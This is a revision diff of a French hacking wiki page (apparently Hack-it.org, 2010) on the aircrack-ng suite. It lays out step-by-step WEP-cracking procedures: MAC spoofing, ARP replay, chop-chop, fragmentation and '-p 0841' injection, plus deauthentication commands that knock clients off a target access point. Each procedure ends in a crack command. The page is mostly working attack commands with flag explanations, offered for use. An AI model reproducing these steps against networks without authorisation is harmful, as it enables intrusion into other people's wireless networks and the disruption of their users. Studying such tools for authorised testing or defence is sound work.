Pork Center

Aircrack-ng

De Hack-it.org.

(Methode "chop-chop" et par fragmentation)
(buddy-ng)
 
Ligne 2 : Ligne 2 :
=== aircrack-ng ===
=== aircrack-ng ===
-
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.
+
Sert à casser une clé WEP ou WPA, depuis la derniere version, il utilise l'algorythme PTW par défaut pour le cassage du WEP.
=== airbase-ng ===
=== airbase-ng ===
-
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".
+
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". Peut aussi être utilisé en mode ad hoc, simule un poste client ad hoc.
=== airdecap-ng ===
=== airdecap-ng ===
Ligne 33 : Ligne 33 :
=== airtun-ng ===
=== airtun-ng ===
 +
 +
Permet de dé/chiffrer en WEP des donnés, il peut servir à se connecter en mode monitor, faire une capture en live qui ne prend pas les beacon frame (utile pour une analyse wireshark / tcpdump)
=== buddy-ng ===
=== buddy-ng ===
-
A utiliser avec easside-ng
+
A utiliser avec easside-ng, c'est le serveur auquel se connecte easside-ng
=== easside-ng ===
=== easside-ng ===
Ligne 91 : Ligne 93 :
== Les différents types d'attaques ==
== Les différents types d'attaques ==
-
Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
+
Dans les cas l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
=== Légende ===
=== Légende ===
Ligne 102 : Ligne 104 :
=== Mac spoofing ===
=== Mac spoofing ===
-
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:
+
Pour les procédures ci-dessous, dans les cas l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:
-
<br />>>>macchanger --mac $mac $iface
+
<br />>>> ifconfig $iface down
-
<br />et relancer la carte.
+
<br />>>>macchanger --mac $mac_client $iface
=== Méthode "ARP replay" ===
=== Méthode "ARP replay" ===
-
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''
+
'''Méthode avec client et sans filtrage MAC'''
* Mettre carte en monitor:
* Mettre carte en monitor:
>>> ifconfig $iface down
>>> ifconfig $iface down
Ligne 134 : Ligne 136 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED !!!''
=== Methode "chop-chop" et "par fragmentation" ===
=== Methode "chop-chop" et "par fragmentation" ===
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
* Mettre la carte en monitor:
* Mettre la carte en monitor:
-
>>> ifconfig $iface down
+
>>> ifconfig $iface  
<br />>>> airmon-ng start $iface
<br />>>> airmon-ng start $iface
Ligne 146 : Ligne 149 :
* Lancer la capture d'IVs:
* Lancer la capture d'IVs:
-
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
+
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
<br />-w = préfice à utiliser pour le nom du fichier de capture
<br />-w = préfice à utiliser pour le nom du fichier de capture
<br />''Laisser tourner...''
<br />''Laisser tourner...''
Ligne 160 : Ligne 163 :
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-q = intervale entre 2 paquets "keep-alive"
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
* Attaque:
* Attaque:
Ligne 185 : Ligne 194 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''
=== Méthode "-p 0841" ===
=== Méthode "-p 0841" ===
Ligne 202 : Ligne 212 :
* Associer la carte à la station:
* Associer la carte à la station:
-
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
+
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
<br />-1 = fake association
<br />-1 = fake association
<br />0 = temps d'attente (en ms) entre 2 tentatives
<br />0 = temps d'attente (en ms) entre 2 tentatives
Ligne 211 : Ligne 221 :
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-q = intervale entre 2 paquets "keep-alive"
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
* Lancer l'injection:
* Lancer l'injection:
Ligne 220 : Ligne 236 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''

Version actuelle en date du 14 novembre 2010 à 21:42